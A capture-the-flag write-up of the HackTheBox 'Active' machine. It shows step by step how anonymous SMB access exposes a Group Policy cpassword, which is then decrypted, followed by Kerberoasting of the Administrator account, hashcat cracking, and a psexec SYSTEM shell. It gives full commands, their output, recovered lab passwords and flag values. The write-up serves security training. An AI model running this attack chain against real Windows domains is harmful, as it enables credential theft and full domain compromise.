Security Vault

Active

Apr 04, 20256 min read

Metadata

  • Platform: HackTheBox
  • CTF: Active
  • OS: Windows
  • Difficulty: Easy

Summary

With guest-level read access to a smb share, the target exposes an AD group policy configuration file. In it, we find a username, as well as a cpassword entry, which we can simply decrypt. This access then allows us to look for kerberoastable account on the AD domain, one of which being Administrator. After retrieving the hash and cracking it, we obtain access to this account, compromising the machine.

Solution

Reconnaissance

With the help of Nmap, we quickly notice that we are dealing with an AD environment.

nmap -sC -sV 10.10.10.100 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 11:23 CEST
Nmap scan report for 10.10.10.100
Host is up (0.046s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-02 09:23:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-04-02T09:24:35
|_  start_date: 2025-04-02T09:21:14
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Since the target does not have that many services we can interact with without credentials, we should start by checking for guest level access. For the open smb service, we can test this with SMBclient.

smbclient -L //10.10.10.100/ -N
Anonymous login successful
 
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk

From this output, we know that in fact have access without any credentials. Nevertheless, the server restricts our access to only one of the two non-standard shares Replication. In it, we find a folder with several AD specific files. For our own comfort, we can download the entire share to our local machine, making it easier to look for valuable files.`

smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
<cut>

Once the download completes, let’s start by searching for credentials, such as a password.

grep -r password .                                                                                                       
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

User Flag

We have a hit in Groups.xml, where the command found the entry cpassword=" edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" for the user active.htb\SVC_TGS. Exposed cpasswords can be easily decrypted, since the according AES keys are publically accessible. For this, we can use a tool such as this one.

python3 gpp-decrypt.py -c 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/home/kali/htb/machines/active/gpp-decrypt/gpp-decrypt.py:13: SyntaxWarning: invalid escape sequence '\ '
  / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 
                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         
 
[ * ] Password: GPPstillStandingStrong2k18

Great! Now we have a set of credentials active.htb\SVC_TGS:GPPstillStandingStrong2k18, which we can use to authenticate against the target. While we can’t connect over WinRM, since the respective port is not open, we can still connect to the User smb share, which we were not able to access with our guest session. This share seems to mount the target’s Users folder, containing all personal directories. We can therefore claim the user flag on the Desktop of svc_TGS.

smbclient //10.10.10.100/Users -U svc_TGS
Password for [WORKGROUP\svc_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018
dc303b6fb2afbfd823f3ea975da10f05

Root Flag

Oftentimes, credentials with access to smb can grant us a shell over PSexec. However, our current credentials only grant us read access to the smb shares, while this tool requires write access. We are therefore stuck with our current access level. Nevertheless, we can use these credentials to enumerate the domain further. As a priority, we should check for any kerberoastable accounts using GetNPUsers.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-04-02 11:22:28.566567

The Administrator account is kerberoastable! This would be a great way to escalate our privileges, so let’s request the Kerberos hash.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-04-02 11:22:28.566567             
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9856<cut>5bd9

Once we save this to a file, we can try to crack it with Hashcat.

hashcat hash -m 13100 /usr/share/wordlists/rockyou.txt
 
<cut>
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9856<cut>5bd9:Ticketmaster1968
<cut>

Quickly, we obtain this account’s password. Just like for the user flag, we can use these credentials to connect to the Usersshare and claim the root flag on the Administrator’s desktop.

f1e10e8d8a89ee05cdf483bb3bc7f5e6

Due to the fact the compromised the Administrator account, we also obtained write access on the smb service. Therefore, we could also now use PSexec to spawn a shell as authority\system.

psexec.py Administrator:Ticketmaster1968@10.10.10.100   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file SULVAUOt.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service kwLz on 10.10.10.100.....
[*] Starting service kwLz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system

Graph View

Backlinks